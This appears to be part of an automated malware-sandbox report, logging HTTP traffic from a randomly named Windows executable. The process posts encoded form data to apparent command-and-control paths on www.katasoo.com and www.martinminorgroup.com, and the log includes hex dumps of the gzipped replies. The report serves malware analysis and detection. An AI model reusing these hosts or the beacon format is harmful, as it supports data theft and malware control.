                                                            Data Raw: 33 36 63 36 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec 7d ed 76 db 38 b2 e0 6f fb 9c 7d 07 84 e9 58 52 c2 6f 7d d8 96 2c 67 33 e9 f4 74 ef 24 93 9e 76 fa f6 ed 4d bc 3a 10 09 49 b4 29 92 21 48 cb 6e b7 1f 68 5f 63 9f 6c 4f 01 20 09 52 a4 24 7f 64 66 f6 ec ed 99 58 12 50 28 14 0a 40 a1 50 28 14 4e 9e 7d ff f1 ed a7 df 7f 7e 87 16 c9 d2 3f dd 3f 79 a6 69 9f bd 19 fa e9 1d 3a 46 e7 a7 e8 04 92 91 8f 83 f9 58 21 81 f6 eb 99 82 1c 1f 53 3a 56 3c 72 8c fc 10 bb 5e 30 d7 a8 97 10 14 84 da 05 55 4e d1 c9 b3 cf 24 70 bd d9 b9 a6 95 f0 1d 6d c3 77 74 0f 7c ed 79 42 18 91 9d 3f 9f b5 7f 7a d7 39 3f 85
                                                            Data Ascii: 36c6}v8o}XRo},g3t$vM:I)!Hnh_clO R$dfXP(@P(N}~??yi:FX!S:V<r^0UN$pmwt|yB?z9?
                                                            Aug 28, 2024 14:04:13.389434099 CEST1236INData Raw: 9c d3 66 f4 0d a8 35 ad 8c 7e 41 b0 7b ba bf 77 b2 24 09 46 ce 02 c7 94 24 63 e5 d7 4f 3f 68 47 0a 32 20 c7 f7 82 4b 14 13 7f ac 44 71 38 f3 7c a2 a0 45 4c 66 63 65 91 24 d1 d0 30 e6 cb 68 ae 87 f1 dc b8 9e 05 86 65 ad 97 f2 82 f9 14 3b 97 95 62
                                                            Data Ascii: f5~A{w$F$cO?hG2 KDq8|ELfce$0he;b84u'\K?=ZDub/JN4p/-YQ9AIc/S/SCm]VvC'] /|!?I'?9,A0\t'%aLNY%p&0HH[K|yK<'Z+>
                                                            Aug 28, 2024 14:04:13.389441013 CEST1236INData Raw: 5c d6 52 45 a5 e3 cf 7c 46 aa 62 54 9c ab 81 2e 44 31 1d df b2 39 9f 2c bc 60 3e 7c 66 aa c5 af 77 d7 0e 89 92 1f 7c 0c e9 77 2a 61 d2 4f d4 58 62 81 a7 63 d7 7d 77 45 82 e4 bd 47 13 58 21 da ca f7 1f 3f bc e5 2a d4 fb 10 bb c4 55 54 a2 de 86 81
                                                            Data Ascii: \RE|FbT.D19,`>|fw|w*aOXbc}wEGX!?*UTCX7q,yJ|10VNgJ8 N3>%HSKiz?';2uu"JS&Sk3b[qU&J=?8b}d:S[B| 9i+fz%yW
                                                            Aug 28, 2024 14:04:13.389906883 CEST672INData Raw: e1 b5 89 0d 76 df 56 ad a3 be 6a 16 6c 80 c4 be 6a 99 22 f1 5e a4 f0 2a 0b 6e b0 29 b1 b9 7e a9 2a c1 07 db 3c 54 7b 03 b5 37 d8 56 39 28 6a 79 57 e0 1b a8 76 5d 08 6c e8 04 bb 7b a4 8a 7f c5 18 18 1c ab d6 51 4f b5 8e fb db aa 77 c2 d0 87 3a 57
                                                            Data Ascii: vVjlj"^*n)~*<T{7V9(jyWv]l{QOw:W8^jLrc=1g]AA1W:(OvH=)6H`fQ[mlzmUk/EjArP5uSzCeEA(XvQlV5
                                                            Aug 28, 2024 14:04:13.389913082 CEST1236INData Raw: ab 16 ab c1 cc 36 41 3b a2 63 b0 35 38 f2 4d d2 8e 78 72 f8 1a 5c b9 d6 b8 23 ae 1c be 06 57 bd 6a ba 1b de da b2 db eb e0 9a f8 83 aa 60 45 eb 6a a8 ee 34 76 c4 5e 29 d6 c8 eb 7b 63 ae 16 6b 1a 11 c5 be ec 1e c3 22 2f d4 48 ef 7d d1 56 4a 35 e2
                                                            Data Ascii: 6A;c58Mxr\#Wj`Ej4v^){ck"/H}VJ5"5n`O S1l,yL0Qr+Y=w}$}{|Ud'y@{d(2<N=eCzzpWKf=tKV=)W(6B
                                                            Aug 28, 2024 14:04:13.389919043 CEST1236INData Raw: 64 06 29 1c 27 da 05 d5 c8 75 12 e3 9a 30 0a 70 e5 6a e5 4c b0 eb 4e 92 70 02 d0 93 08 c7 78 c9 03 29 e0 0b 7c 3d 49 59 e4 03 16 74 00 bb 4b 2f f8 62 b0 0f 0d 32 59 a4 11 55 01 0c 32 e8 6b 20 e0 02 5f 8f 5f bc 20 81 1b 85 5e 90 bc 78 a1 a8 8a 67
                                                            Data Ascii: d)'u0pjLNpx)|=IYtK/b2YU2k __ ^xgX'YMP*f X8fr1q8C{]o;,2A X+k`H<~3G<-WYo"8imnx4JFq<xAt1$7
                                                            Aug 28, 2024 14:04:13.389930964 CEST1236INData Raw: cb 68 c1 3b d8 10 79 cb f9 19 f3 d8 08 63 34 46 0a 1b 90 90 a8 22 1d e4 bf f8 ba f2 dc 39 49 32 45 3f cb 17 eb 84 00 11 fb 25 f1 33 c1 d7 99 b8 9b 38 38 03 82 a5 08 be 2a a3 9c 80 8c 2e a8 6c 2c 4d 40 7a 46 fc 75 9d 81 27 57 47 44 55 32 18 46 18
                                                            Data Ascii: h;yc4F"9I2E?%388*.l,M@zFu'WGDU2F{s/>e]v{13slo7Z+gzCY A`hk1FcG,}s?DUlC:U>}z5IF|H*ptfz+<y.oW!SR}>\
                                                            Aug 28, 2024 14:04:13.389938116 CEST1236INData Raw: bf 05 c9 57 86 c4 ea 9b ad 4c 13 ab c3 63 9a d5 b5 5c c6 91 70 1c 66 86 a3 52 1a 42 d4 6d 28 bd 64 a5 ed 1e 94 2e 71 ef e5 18 99 fa b1 c4 3c 09 67 d7 de 88 33 60 38 bb 76 03 45 fd 8d ed 61 65 fb 4d ad 19 6c 6e cd 1f ac f4 a0 d7 50 fa 68 33 27 1d
                                                            Data Ascii: WLc\pfRBm(d.q<g3`8vEaeMlnPh3'V({b*xmZUGbIM^f,\PdU+JY1S&,sN<Kc8d&7>s4x&F[kT{1y}:lAyY?*E4
                                                            Aug 28, 2024 14:04:13.390197992 CEST1236INData Raw: 8e 53 84 d5 72 5e 9e 05 dc 05 61 06 7e f6 8c 3c b8 00 1c cc 55 be 47 63 6d 1f b7 04 15 ad 73 95 45 7f 16 58 32 e2 6e ab 52 33 67 4c c1 2d f4 d2 e0 18 99 fb 31 47 ab 88 f2 ca 79 05 43 85 c9 7f c9 fb 22 e7 b7 84 6b 3a 97 11 d5 0c 60 89 2a 09 d3 4b
                                                            Data Ascii: Sr^a~<UGcmsEX2nR3gL-1GyC"k:`*KCsAMS'.w\ SkYLd2#Fl?*F1!F82W&eb_y19N^@t}XaRS<)rT"H|>u!Qbdc1s".g7R
                                                            Aug 28, 2024 14:04:13.390202999 CEST1236INData Raw: d4 62 ff 8d d0 9d 17 d0 9d 0a 90 69 f7 b8 7b 3c 42 b5 aa 8d 17 e4 aa 0d 98 c9 3b b7 45 18 0e c6 84 7c 49 2d 58 72 2b 15 b2 7b 87 f2 59 c0 a8 21 f9 ee 4e 9f 85 61 42 62 cd ae 3d 04 38 9a 61 38 04 c0 53 1a fa 69 02 51 a6 43 36 36 c0 47 60 53 81 62
                                                            Data Ascii: bi{<B;E|I-Xr+{Y!NaBb=8a8SiQC66G`Sb.#qD1ro)x6ZBtX('+eA/d3aR@H~}RGa6)0$=~M\ZjGEQsJco-wkC?"HKS
                                                            Aug 28, 2024 14:04:13.397073030 CEST1236INData Raw: 4a 73 8a 7f f5 3d 51 21 9f 79 fb 52 ca fd a6 a4 50 05 ef 3f 33 6b 75 c1 2d 33 b3 46 19 e4 33 f1 7e 73 af d8 de ec 32 e9 9a e6 99 74 44 91 84 73 08 74 c8 ce a1 c3 a8 32 0d 4b aa 26 9f 57 61 94 46 99 fe c8 b1 cb e7 1d 6c 76 97 a6 7a a1 95 16 0c 7a
                                                            Data Ascii: Js=Q!yRP?3ku-3F3~s2tDst2K&WaFlvzzI/Bg!od.Ei ~ 5a5Rn|Ze^x2ub,zM00)MMDmXv<4/.f}eLG)$Yvum465*Z$


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            18192.168.2.449760188.114.96.380792C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exe
                                                            TimestampBytes transferredDirectionData
                                                            Aug 28, 2024 14:04:15.251789093 CEST10872OUTPOST /7qad/ HTTP/1.1
                                                            Host: www.katasoo.com
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.9
                                                            Accept-Encoding: gzip, deflate, br
                                                            Content-Length: 10302
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: no-cache
                                                            Connection: close
                                                            Origin: http://www.katasoo.com
                                                            Referer: http://www.katasoo.com/7qad/
                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                            Data Raw: 34 4e 5a 70 62 3d 51 61 6d 78 70 63 43 68 68 62 6b 6e 61 6b 51 6a 68 33 64 41 52 6c 6e 77 67 74 31 58 47 67 58 78 6d 4f 57 49 6c 64 4b 62 36 43 78 4f 52 53 70 41 63 6f 6a 30 4a 6a 33 54 45 6b 5a 77 76 6d 6a 4d 42 67 71 65 45 2b 4e 44 32 33 61 53 75 30 57 32 43 7a 55 39 6b 79 36 4f 47 30 75 6f 61 4d 49 73 56 72 54 34 35 73 6f 66 4c 4d 69 73 62 77 58 69 46 30 78 4b 39 47 61 4e 72 2b 77 58 48 4b 4e 2b 59 6e 47 6e 50 47 63 37 43 6e 74 47 36 50 54 4d 55 43 71 31 32 55 54 4c 59 69 32 4d 50 6e 38 71 5a 35 7a 62 79 68 36 49 45 57 43 44 73 2f 55 32 74 46 71 69 77 53 71 35 52 79 55 35 69 41 73 54 70 77 61 41 65 70 74 65 76 73 54 77 47 61 47 57 64 62 55 4f 4c 74 64 33 66 62 37 66 41 64 33 79 47 71 70 74 6d 66 39 43 6e 4d 71 42 4d 62 6a 53 2f 4b 56 75 6c 6a 67 55 4d 77 4a 4a 4b 31 72 4b 37 50 54 37 67 4b 6a 6a 7a 34 44 6c 69 55 55 63 6b 59 4e 33 6e 48 2f 4b 75 6a 4a 73 69 48 59 67 6c 68 2f 77 73 65 73 38 62 41 6f 4e 31 35 37 2b 53 68 38 41 4d 50 32 45 49 2b 6f 64 58 6a 46 4a 48 46 4d 55 62 55 38 37 59 46 62 55 [TRUNCATED]
                                                            Data Ascii: 4NZpb=QamxpcChhbknakQjh3dARlnwgt1XGgXxmOWIldKb6CxORSpAcoj0Jj3TEkZwvmjMBgqeE+ND23aSu0W2CzU9ky6OG0uoaMIsVrT45sofLMisbwXiF0xK9GaNr+wXHKN+YnGnPGc7CntG6PTMUCq12UTLYi2MPn8qZ5zbyh6IEWCDs/U2tFqiwSq5RyU5iAsTpwaAeptevsTwGaGWdbUOLtd3fb7fAd3yGqptmf9CnMqBMbjS/KVuljgUMwJJK1rK7PT7gKjjz4DliUUckYN3nH/KujJsiHYglh/wses8bAoN157+Sh8AMP2EI+odXjFJHFMUbU87YFbUSpWX1hUHsVRgqm4W+aXZfZ1y+JACQ0vBugjxp2CO0ilNHIhR1zpewyk3ZcByKo73ll6phFFAMGH81NyEXMJ2wY4l8GZt6OasFTSrRrjk9kIdbGcVBYdi9lRAf5YOypitdhb0hDOGvRB6J/WnTLYpANXAMuNgEpdBnMLAP0ZstFLWrfeOQK6+g0Euj7xy6PnDvZG/p0oupIq3p4I1dGfnLTrJlnK/sn2MhQqFL83ek2jIOnbGePlqLxMNxny7DWmmnjrloi/NXb8ZmQZD2zvRvlgscTaPOLQOuAxjWSJ+pAYiy3oSPk8BX9HcmUWn5R64Y2x1Mf8pWGxOFReujtQWYfRvKsCu3ENOWXP4dSVKrIheoh3syyXjgCwcHTwLBtZNL03R1SjbTIYoBnsyY+GjstpnBxQrNB9VtECL+5LTWsv4VckErmTcX7/GykFSg8TIXpsx79pYO+T+LncI43roE7AVSCvlUJGe+xr46h3/eT0JTWBZs5wBdbnZ2skLKg6AWBD0pz7RCLxrd4brtUA177lsKn2eXkEFx4eVx09CojgHICUb8Rg0qfrxQ3q+IsGJa85A0e+/REjAFH1IwYd8+Qr12dW+jolo9LDvqPOPocLQOB4ZQ5uzsI5MtpwWwqj2oDw4gxmJey1AMjjxx8jzT5K0p9MjQ5m5LO [TRUNCATED]
                                                            Aug 28, 2024 14:04:15.934319019 CEST1236INHTTP/1.1 404 Not Found
                                                            Date: Wed, 28 Aug 2024 12:04:15 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                            cache-control: no-cache, must-revalidate, max-age=0
                                                            set-cookie: wp_woocommerce_session_cfa12a8f8cbb64cd768d0f772536504c=t_b21e6b470e46914bacef13fb9474ae%7C%7C1725019455%7C%7C1725015855%7C%7Cb952974e6c119af1c02ddd0a324ce78b; expires=Fri, 30-Aug-2024 12:04:15 GMT; Max-Age=172800; path=/; HttpOnly
                                                            link: <https://katasoo.com/wp-json/>; rel="https://api.w.org/"
                                                            vary: Accept-Encoding
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=o7YaOfMKytBCR1sb9a1fQDo870HlpHNeUvOL8WqcjvG1QL41DxFQ4h3GrhguKz7SpjCNuwo%2Flw4CSNSP%2BeRdzAmMzTNaaNhZ5KkwXBlt%2FU3lna1QF5DGZ9VeqQHJpSNLwSI%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8ba429addc408cdd-EWR
                                                            Content-Encoding: gzip
                                                            alt-svc: h3=":443"; ma=86400
                                                            Data Raw: 33 36 63 38 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec 7d eb 76 db 38 d2 e0 6f fb 9c 7d 07 84 e9 58 52 c2 bb 2e b6 25 cb d9 4c 3a 3d dd 3b c9 a4 a7 9d fe fa eb 4d bc 3a 10 09 49 b4 29 92 21 48 cb 6e b5 1e 68 5f 63 9f 6c 4f 01 20 09 52 d4 c5 97 cc cc 9e fd 7a 26 96 04 14 0a 85 02 50 28 14 0a 85 b3 67 df 7f 7c fb e9 f7 9f df a1 59 32 f7 cf 0f cf 9e 69 da 67 6f 82 7e 7a 87 4e d1 e5 39 3a 83 64 e4 e3 60 3a 54 48 a0 fd 7a a1 20 c7 c7 94 0e 15 8f 9c 22 3f c4 ae 17 4c 35 ea 25 04 05 a1 76 45 95 73 74 f6 ec 33 09 5c 6f 72 a9 69 25 7c 27 bb f0 9d dc 03 5f 73 9a 10 46 64 eb cf 67 cd 9f de b5 2e cf 21 e7 7c 33 fa 0d a8 35 ad
                                                            Data Ascii: 36c8}v8o}XR.%L:=;M:I)!Hnh_clO Rz&P(g|Y2igo~zN9:d`:THz "?L5%vEst3\ori%|'_sFdg.!|35
                                                            Aug 28, 2024 14:04:15.934345007 CEST1236INData Raw: 8c 7e 46 b0 7b 7e 78 70 36 27 09 46 ce 0c c7 94 24 43 e5 d7 4f 3f 68 27 0a 32 20 c7 f7 82 6b 14 13 7f a8 44 71 38 f1 7c a2 a0 59 4c 26 43 65 96 24 51 df 30 a6 f3 68 aa 87 f1 d4 b8 9d 04 86 65 ad 97 f2 82 e9 18 3b d7 95 62 d7 38 c1 34 0c 75 27 9c
                                                            Data Ascii: ~F{~xp6'F$CO?h'2 kDq8|YL&Ce$Q0he;b84u's?=Eub/J4p/s$C1k6hj5I$H;Gkpf/x<K$L=?-kIFI3rxN8m '$jO#)i@3
                                                            Aug 28, 2024 14:04:15.934350014 CEST1236INData Raw: 51 71 a9 06 ba 10 c5 74 b8 64 73 3e 99 79 c1 b4 ff cc 54 8b 5f ef 6e 1d 12 25 3f f8 18 d2 57 2a 61 d2 4f d4 58 62 81 a7 63 d7 7d 77 43 82 e4 bd 47 13 58 21 9a ca f7 1f 3f bc e5 2a d4 fb 10 bb c4 55 54 a2 2e c3 c0 21 ac 1b 56 5c 78 ad 21 4b 38 bf
                                                            Data Ascii: Qqtds>yT_n%?W*aOXbc}wCGX!?*UT.!V\x!K8aR,d~q2Lx(OHR/?GGugvNLh./j|WMF7DGG^vX?v+QHR<%MDO6[se-5`H
                                                            Aug 28, 2024 14:04:15.934464931 CEST1236INData Raw: 06 48 ec aa 96 29 12 ef 45 0a af b2 e0 06 9b 12 db eb 97 aa 12 7c b0 cd 63 b5 d3 53 3b bd 5d 95 83 a2 96 77 05 be 83 6a d7 85 c0 96 4e b0 db 27 aa f8 57 8c 81 de a9 6a 9d 74 54 eb b4 bb ab 7a 27 0c 7d a8 73 81 e3 b9 c6 c4 59 9c ce b7 56 78 dc 51
                                                            Data Ascii: H)E|cS;]wjN'WjtTz'}sYVxQv:^sj-dP'Kk,]NjwN)2lDf|fWzbPt;jv-*7US{Q7{4Z]4uj5]U3Y:d4`vXE'6
                                                            Aug 28, 2024 14:04:15.934470892 CEST1236INData Raw: 0a 8c b1 ac 8a 87 50 2f b9 a2 86 21 bb 84 17 3b 24 f3 88 db ea 18 a7 4b 05 10 0c 7d a4 b3 09 10 87 0b a4 c3 05 0d 2f 26 2e 5a a2 1b 8f 7a 63 cf f7 92 bb 3e ff ee 93 01 da d3 4b 33 0c b5 1b 1c 7b cc 9d 4f a3 0b f0 d6 26 f4 61 9c 5c c7 b3 93 85 d6
                                                            Data Ascii: P/!;$K}/&.Zzc>K3{O&a\{;'dZ94uB7-i29Q_)x}&$68g6?lZt;mX6`lu4o(7^hp2:a\+&qxMv;eIMw
                                                            Aug 28, 2024 14:04:15.934483051 CEST1236INData Raw: 08 e9 7f 68 5e e0 92 5b a0 a6 d3 85 e6 e5 bb ea 4c 2a 9c 5f fd 03 b4 c7 3c 1a 5b 8b 5f 8f cf ef d3 a3 e6 77 2d c1 01 c3 40 3e fe e3 8e 05 c9 63 09 10 06 af d1 c8 b2 e1 3f 8e 4c 27 b7 20 0f 9a e2 17 14 82 d8 1f ff f9 49 95 40 e1 3f 1a 3b 6f 92 24
                                                            Data Ascii: h^[L*_<[_w-@>c?L' I@?;o$4vj@>>8cr~eEufpbfD8}37`tRf9Usnuy>Pua_$dhjY*2=0p-HLu)9P
                                                            Aug 28, 2024 14:04:15.934489965 CEST1236INData Raw: b0 76 a3 ce 34 5d c3 40 cc 59 67 5c ec a9 0f f7 37 a3 e4 fc c9 1d 7e a8 90 e0 8d ed 83 e1 29 b6 dd 33 cf 75 49 20 cf a6 bd 76 64 f5 76 80 6f 64 0b 10 bb bb 6e b1 bb cb b6 17 4c 3b b7 24 f5 3c 53 df f7 60 2c b3 05 6d 68 22 0c 24 6f 9c 26 a4 2a f7
                                                            Data Ascii: v4]@Yg\7~)3uI vdvodnL;$<S`,mh"$o&*#L[F&"[,~}4DAi0-njQEBgiA.kR<'RzjARQw_*OR0@nj9j=22L|}Le%AjakNa)InA
                                                            Aug 28, 2024 14:04:15.934721947 CEST1236INData Raw: 82 30 af 79 cd 8d ab 3a 43 97 a8 18 9f 25 07 ac 62 ac 1a 39 be c3 83 b2 3f 19 5b 7c d9 53 94 10 7e c0 9b 08 57 37 69 e6 7e fd 8f 9f 7e bb f9 3a fb f8 eb df 7e 9f 4e fe ba f8 f4 3f d3 29 be 31 ff 66 5b 38 fa c7 df 8e bd 8f ee e4 d7 df 7e 3b 4d c3
                                                            Data Ascii: 0y:C%b9?[|S~W7i~~:~N?)1f[8~;M{.}~c<s?P}b%`.S6a`4io6{-R9[uZ^=A}#bN[T<T>y>?:[X#/
                                                            Aug 28, 2024 14:04:15.934727907 CEST1236INData Raw: 68 55 b2 9d e4 8b a0 d8 5a f2 a1 fe 08 ec c6 4b f4 83 e7 fb 4c e3 60 0c de af 3b f6 06 e6 5d b0 84 70 2f 1b b5 9d b2 de 54 2c b1 97 b9 1a 43 89 13 06 6e 55 03 cd a6 50 29 b7 3c ee 4b 0b 76 a6 2e 64 e0 35 9a 41 b1 2c d5 48 3e 79 2e ea b0 2d c2 4c
                                                            Data Ascii: hUZKL`;]p/T,CnUP)<Kv.d5A,H>y.-Ler5R\9cprt>hB%yr2v,<@F^J[zVx':~dD,XLvT6|ee^)X.sQT)R$}.Jy0"(*8n
                                                            Aug 28, 2024 14:04:15.934740067 CEST1236INData Raw: 00 10 33 7c 66 e7 41 0c f8 e0 20 1f 69 cf 45 ac af 30 22 81 10 03 1a 08 55 91 1c 85 74 a8 30 b2 f8 6f 30 e2 e4 30 99 9e 24 f2 84 05 23 e7 b3 27 de 8b 50 10 48 4c 2e f6 86 ca 07 86 9c a5 88 8b 2f 54 42 29 72 c8 6d 84 03 97 b8 43 85 39 e7 32 99 70
                                                            Data Ascii: 3|fA iE0"Ut0o00$#'PHL./TB)rmC92pxp9/r~fx,{%GogKj%,;WJ+rfRDA[^aN8KKZ02Jo1XfG WU\Bd~-QQf{|)+Am
                                                            Aug 28, 2024 14:04:15.939670086 CEST1236INData Raw: 63 4a 9c 82 b4 2b bb 5b c1 2b 70 63 51 10 3b 3d 1b 2a 92 e7 57 8f cc 07 a8 e4 e3 02 ce fa 83 e2 4a ac de 56 ce 3b 66 27 df b9 0a 93 d0 66 02 4e 0b 7b 9c 38 3f 12 30 c5 61 67 0e 71 70 36 b3 ea b2 3f 86 11 7d 86 3e cd 30 0f b1 8e 1c 1c 1c c5 f4 6b
                                                            Data Ascii: cJ+[+pcQ;=*WJV;f'fN{8?0agqp6?}>0k4c1^^726 ?)k?S^{(4>1AI|t8a,W?\ /2Mfun(Bmj1<t;(vohIeJ,%dxAlt


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            19192.168.2.449761188.114.96.380792C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exe
                                                            TimestampBytes transferredDirectionData
                                                            Aug 28, 2024 14:04:17.784651995 CEST511OUTGET /7qad/?8le=9XPp_0_hUrF45X&4NZpb=dYORqrGPl6AcSXgEwgocZknilcNUJSfM/+S50qW66GlmVgNZNuPxURDbCEwQ3kacCSCgEPZE3S2FpF+/JDcjyCmKfw+KdJsCQKHf2KgYBqirYhXsdXIYoQE= HTTP/1.1
                                                            Host: www.katasoo.com
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.9
                                                            Connection: close
                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                            Aug 28, 2024 14:04:18.440270901 CEST1140INHTTP/1.1 301 Moved Permanently
                                                            Date: Wed, 28 Aug 2024 12:04:18 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                            cache-control: no-cache, must-revalidate, max-age=0
                                                            set-cookie: wp_woocommerce_session_cfa12a8f8cbb64cd768d0f772536504c=t_a9ea725040cb8e19eaddd4f16c2c34%7C%7C1725019458%7C%7C1725015858%7C%7Ce048d9e0e9eadcc83535b16220447699; expires=Fri, 30-Aug-2024 12:04:18 GMT; Max-Age=172800; path=/; HttpOnly
                                                            x-redirect-by: WordPress
                                                            location: http://katasoo.com/7qad/?8le=9XPp_0_hUrF45X&4NZpb=dYORqrGPl6AcSXgEwgocZknilcNUJSfM/+S50qW66GlmVgNZNuPxURDbCEwQ3kacCSCgEPZE3S2FpF+/JDcjyCmKfw+KdJsCQKHf2KgYBqirYhXsdXIYoQE=
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lA3oeg6STlrtWGrj%2BvwXtR%2FOwyJhnxb8vZI8ceIeubVr0ssxvBJ%2BONcM2Y0YGJb8R0Q6Y39aD4159VhzRKprdnQyWokmNaXIOMcI8QSUWsrsglVahKK3I3Czlr8YCDWN85c%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8ba429bdaaf317f5-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            Data Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            20192.168.2.44976234.149.87.4580792C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exe
                                                            TimestampBytes transferredDirectionData
                                                            Aug 28, 2024 14:04:23.507682085 CEST797OUTPOST /oyqt/ HTTP/1.1
                                                            Host: www.martinminorgroup.com
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.9
                                                            Accept-Encoding: gzip, deflate, br
                                                            Content-Length: 202
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: no-cache
                                                            Connection: close
                                                            Origin: http://www.martinminorgroup.com
                                                            Referer: http://www.martinminorgroup.com/oyqt/
                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                            Data Raw: 34 4e 5a 70 62 3d 74 4f 47 38 7a 74 4a 62 78 35 70 33 4a 71 34 64 6d 4f 76 73 38 37 35 5a 69 78 7a 55 34 46 75 59 72 50 35 58 78 4f 47 75 45 50 54 36 32 36 57 42 68 70 53 33 58 4f 6a 78 2b 38 67 51 77 61 38 45 33 61 2b 79 6a 2b 45 30 2f 61 77 44 65 76 58 30 49 34 4b 56 70 6e 71 66 51 67 38 32 4f 70 67 33 53 70 6a 43 7a 4c 43 35 6e 4a 2f 6d 64 6c 32 53 4f 63 49 62 57 69 72 6a 45 35 2f 6d 61 6b 34 54 45 50 70 36 4d 31 74 72 44 39 5a 4c 38 57 6c 51 68 66 43 42 6c 61 42 59 57 58 44 51 6a 53 34 37 6d 76 6c 49 5a 4e 58 73 6d 70 36 36 6c 33 41 6b 55 31 32 36 67 46 58 6a 76 6e 54 35 4d 76 62 70 4c 51 3d 3d
                                                            Data Ascii: 4NZpb=tOG8ztJbx5p3Jq4dmOvs875ZixzU4FuYrP5XxOGuEPT626WBhpS3XOjx+8gQwa8E3a+yj+E0/awDevX0I4KVpnqfQg82Opg3SpjCzLC5nJ/mdl2SOcIbWirjE5/mak4TEPp6M1trD9ZL8WlQhfCBlaBYWXDQjS47mvlIZNXsmp66l3AkU126gFXjvnT5MvbpLQ==
                                                            Aug 28, 2024 14:04:23.975227118 CEST396INHTTP/1.1 301 Moved Permanently
                                                            Content-Length: 0
                                                            Location: https://www.martinminorgroup.com/oyqt/
                                                            Accept-Ranges: bytes
                                                            Date: Wed, 28 Aug 2024 12:04:23 GMT
                                                            X-Served-By: cache-iad-kcgs7200079-IAD
                                                            X-Cache: MISS
                                                            X-Seen-By: yvSunuo/8ld62ehjr5B7kA==,jKB0KR2wTEE1MYSdxvKSbciHE4dbw+wewoJ5nvKoyjE=
                                                            Via: 1.1 google
                                                            glb-x-seen-by: bS8wRlGzu0Hc+WrYuHB8QIg44yfcdCMJRkBoQ1h6Vjc=
                                                            Connection: close


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            21192.168.2.44976334.149.87.4580792C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exe
                                                            TimestampBytes transferredDirectionData
                                                            Aug 28, 2024 14:04:26.049773932 CEST817OUTPOST /oyqt/ HTTP/1.1
                                                            Host: www.martinminorgroup.com
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.9
                                                            Accept-Encoding: gzip, deflate, br
                                                            Content-Length: 222
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: no-cache
                                                            Connection: close
                                                            Origin: http://www.martinminorgroup.com
                                                            Referer: http://www.martinminorgroup.com/oyqt/
                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                            Data Raw: 34 4e 5a 70 62 3d 74 4f 47 38 7a 74 4a 62 78 35 70 33 4b 4b 49 64 32 5a 7a 73 70 4c 35 61 74 52 7a 55 76 56 75 63 72 4f 46 58 78 50 7a 7a 45 39 6e 36 32 62 47 42 6d 6f 53 33 55 4f 6a 78 6e 4d 67 56 75 71 38 62 33 62 44 53 6a 2f 55 30 2f 63 63 44 65 71 37 30 50 4c 53 53 6d 58 71 42 4c 51 38 30 54 35 67 33 53 70 6a 43 7a 4c 57 41 6e 4a 33 6d 64 32 75 53 50 2b 67 61 62 43 72 67 4f 5a 2f 6d 4e 30 34 58 45 50 70 59 4d 30 42 52 44 37 56 4c 38 58 31 51 68 4d 61 43 76 61 42 61 53 58 43 78 6d 53 52 44 69 4e 56 48 51 39 48 50 70 6f 47 74 6b 78 52 2b 46 45 58 74 79 46 7a 51 79 67 61 4e 42 73 6d 67 51 65 73 4c 68 71 68 4b 72 62 45 72 69 56 33 50 33 51 74 30 48 66 51 3d
